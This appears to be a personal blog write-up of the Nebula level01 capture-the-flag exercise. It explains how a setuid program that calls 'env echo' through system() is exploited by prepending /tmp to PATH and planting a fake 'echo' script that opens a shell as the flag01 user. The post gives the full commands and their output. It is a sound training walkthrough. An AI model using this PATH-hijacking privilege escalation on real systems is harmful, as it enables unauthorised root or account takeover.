my infosec notes

my personal collection of infosec tips and tricks

2018-05-27

exploit-exercises.com - nebula - level01

by palaziv


In the second Nebula level we need to find and exploit a vulnerability in the program below (the source of the flag01 binary):

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;
  /* the effective ids come from the setuid/setgid bits on the binary */
  gid = getegid();
  uid = geteuid();

  /* copy the effective ids into the real and saved ids as well, so that
     anything started from here keeps the elevated privileges */
  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  /* runs through /bin/sh; env resolves "echo" by searching $PATH */
  system("/usr/bin/env echo and now what?");
}

The last line is interesting. Instead of calling echo directly, the program runs the command through /usr/bin/env, which means it will run whatever the default echo is in the current environment or, more precisely, the first executable named echo found in the directories listed in the user's $PATH.

Let’s check our $PATH:

level01@nebula:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games

So env first looks for the echo program in /usr/local/sbin, then in /usr/local/bin and so on. If we change the $PATH variable and put a directory we control in front of it, and place a file called echo in that directory, then that file will be executed instead!

level01@nebula:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
level01@nebula:~$ PATH=/tmp:$PATH
level01@nebula:~$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games

Let's copy the bash binary to /tmp and rename it to echo:

level01@nebula:/home/flag01$ whereis bash
bash: /bin/bash /etc/bash.bashrc /usr/share/man/man1/bash.1.gz
level01@nebula:/home/flag01$ cp /bin/bash /tmp/
level01@nebula:/home/flag01$ ls -l /tmp/
total 904
-rwxr-xr-x 1 level01 level01 916692 2018-05-27 01:11 bash
level01@nebula:/home/flag01$ mv /tmp/bash /tmp/echo
level01@nebula:/home/flag01$ ls -l /tmp/
total 904
-rwxr-xr-x 1 level01 level01 916692 2018-05-27 01:11 echo

Now if we run the flag01 program, our fake echo command will run and we should get a new shell with the rights of the owner of the flag01 program:

level01@nebula:/home/flag01$ ./flag01 
echo: and: No such file or directory

What happened here? The program calls echo (now bash) with the arguments and, now and what?. From man bash:

"If arguments remain after option processing, and neither the -c nor the -s option has been supplied, the first argument is assumed to be the name of a file containing shell commands. If bash is invoked in this fashion, $0 is set to the name of the file, and the positional parameters are set to the remaining arguments. Bash reads and executes commands from this file, then exits. Bash's exit status is the exit status of the last command executed in the script. If no commands are executed the exit status is 0. An attempt is first made to open the file in the current directory, and, if no file is found, then the shell searches the directories in PATH for the script."

So bash tried to open a script called "and" and failed. We have to find a way to ignore these arguments. Let's write a simple script which starts a new shell and ignores and now what?:

#!/bin/bash
bash

Save this in a file called echo under /tmp (replacing the copied bash binary), make it executable and run the program again:

level01@nebula:/home/flag01$ ls -l /tmp/
total 4
-rw-rw-r-- 1 level01 level01 17 2018-05-27 02:01 echo
level01@nebula:/home/flag01$ chmod +x /tmp/echo 
level01@nebula:/home/flag01$ ls -l /tmp/
total 4
-rwxrwxr-x 1 level01 level01 17 2018-05-27 02:01 echo
level01@nebula:/home/flag01$ cat /tmp/echo 
#!/bin/bash
bash
level01@nebula:/home/flag01$ ./flag01 
flag01@nebula:/home/flag01$ whoami
flag01

Success! Now let’s grab the flag:

flag01@nebula:/home/flag01$ getflag 
You have successfully executed getflag on a target account